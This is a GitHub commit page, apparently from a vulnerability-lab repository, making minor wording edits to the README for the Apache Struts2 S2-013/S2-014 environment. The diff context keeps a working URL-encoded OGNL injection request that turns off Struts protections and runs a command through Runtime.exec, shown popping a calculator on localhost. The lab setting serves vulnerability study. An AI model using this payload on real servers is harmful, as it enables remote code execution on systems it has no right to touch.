Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
JrDw0 authored and phith0n committed Nov 15, 2018
1 parent d712e98 commit b14558c
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions struts2/s2-013/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,21 +2,21 @@

[中文版本(Chinese version)](README.zh-cn.md)

Version: 2.0.0 - 2.3.14.1
Affected Version: 2.0.0 - 2.3.14.1

Details:

- http://struts.apache.org/docs/s2-013.html
- http://struts.apache.org/docs/s2-014.html

## setup
## Setup

```
docker-compose build
docker-compose up -d
```

## Refer
## Reference

The Struts2's tag, `<s:a>` and `<s:url>`, provide an includeParams attribute.The main scope of that attribute is to understand whether includes http request parameter or not.

Expand Down Expand Up @@ -46,4 +46,4 @@ S2-014 is a correction to S2-013. Because when S2-013 is fixed, the execution me

```
http://localhost:8080/S2-013/link.action?xxxx=%24%7B%28%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%29%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29%28@java.lang.Runtime@getRuntime%28%29.exec%28%22open%20%2fApplications%2fCalculator.app%22%29%29%7D
```
```

0 comments on commit b14558c

Please sign in to comment.